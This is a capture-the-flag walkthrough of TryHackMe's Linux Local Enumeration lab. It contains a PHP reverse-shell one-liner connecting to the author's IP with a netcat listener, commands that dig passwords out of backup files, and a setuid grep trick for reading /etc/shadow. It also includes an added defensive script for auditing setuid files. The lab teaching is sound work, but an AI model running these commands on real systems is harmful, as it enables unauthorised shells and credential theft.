The Dutch Hacker
Linux Local Enumeration

Linux Local Enumeration on TryHackMe

This is the write-up for the room Linux Local Enumeration on TryHackMe, and it is part of the complete beginners path.

Connect over the VPN or use the AttackBox on the TryHackMe site to reach the TryHackMe lab environment.

Tasks Linux Local Enumeration

Task 1

Read all that is in the task and start the machine attached to this task.

Connect to the machine by navigating to MACHINE_IP:3000 with Firefox.

I’m using method one

Start a listener in a terminal by typing

nc -nlvp 4444

Navigate to MACHINE_IP:3000/cmd

Put in the following (change the IP to your tun0 IP)

php -r '$sock=fsockopen("10.9.135.33",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

You now have a shell. Upgrade shell by typing in

python3 -c 'import pty; pty.spawn("/bin/bash")'

Task 2

2.1 How would you execute /bin/bash with perl?

Google perl bin bash shell. I came across this site
Spawning a TTY Shell (netsec.ws)

Answer: perl -e 'exec "/bin/bash";'

Task 3

3.1 Where can you usually find the id_rsa file? (User = user)

Answer: /home/user/.ssh/id_rsa

3.2 Is there an id_rsa file on the box? (yay/nay)

In the shell, navigate to .ssh

Answer: nay

Task 4

4.1 How would you print machine hardware name only?

Answer: uname -m

4.2 Where can you find bash history?

Answer: ~/.bash_history

4.3 What’s the flag?

Type in

cat .bash_history

The flag is in this file. Just read the history

Task 5

Read all that is in the task

5.1 Can you read /etc/passwd on the box? (yay/nay)

Type in the command

cat /etc/passwd

Answer: yay

Task 6

Read all that is in the task

6.1 What’s the password you found?

Navigate to the root directory (/), then type in the following command

find -type f -name "*.bak" 2>/dev/null

cat the correct file and notice the password

6.2 Did you find a flag?

Type in the command

find -type f -name "*.conf" 2>/dev/null

There is a very long list, but look closer and you will find

./etc/sysconf/flag.conf

Cat this to screen and you will see the flag

Task 7

7.1 Which SUID binary has a way to escalate your privileges on the box?

Type in the command

find / -perm -u=s -type f 2>/dev/null

If we look through the list on GTFOBins we find grep

Answer: grep

7.2 What’s the payload you can use to read /etc/shadow with this SUID?

We know grep can read root files.

Answer: grep '' /etc/shadow

You now see the password list.
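The Task 7 finding from the defender's side: a setuid grep shows up because it is not part of a normal install. The script below is an added example, not part of the room or the original write-up; it lists setuid files that are missing from an expected baseline. The baseline contents and the function names are assumptions for illustration.

```shell
#!/bin/sh
# Added example: report setuid files that are not in an expected baseline.
# SUID_BASELINE is an assumed list for illustration; build the real one from
# a known-good install of your distribution.
SUID_BASELINE="/usr/bin/su /usr/bin/sudo /usr/bin/passwd /usr/bin/mount
/usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# unexpected_suid ROOT
# Prints, one per line, every setuid regular file under ROOT whose path
# (relative to ROOT) is not in SUID_BASELINE. Prints nothing for a clean tree.
unexpected_suid() {
    root=${1%/}                      # "/" becomes "", "/mnt/img/" -> "/mnt/img"
    baseline=" $(printf '%s' "$SUID_BASELINE" | tr '\n' ' ') "
    find "${root:-/}" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        rel=${path#"$root"}          # path as it would appear on the live system
        case "$baseline" in
            *" $rel "*) ;;           # expected setuid binary, skip
            *) printf '%s\n' "$path" ;;
        esac
    done
}

# count_unexpected_suid ROOT: number of findings, usable as a monitoring check.
count_unexpected_suid() {
    unexpected_suid "$1" | wc -l | tr -d ' '
}

# Run a scan only when asked: sh suid_audit.sh --scan [ROOT]
if [ "${1:-}" = "--scan" ]; then
    unexpected_suid "${2:-/}"
fi
```

Any path it prints deserves a look: a setuid text or file utility such as the grep in this room lets any local user read root-only files, and the fix is to remove the bit with chmod u-s.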

Task 8

Use both commands on your machine to see the results, then press complete

Task 9

Notice the two scripts, LinPeas and LinEnum. There are also Windows versions of these tools to run on Windows platforms.

Press complete

Task 10

Read all that is in the task and press complete
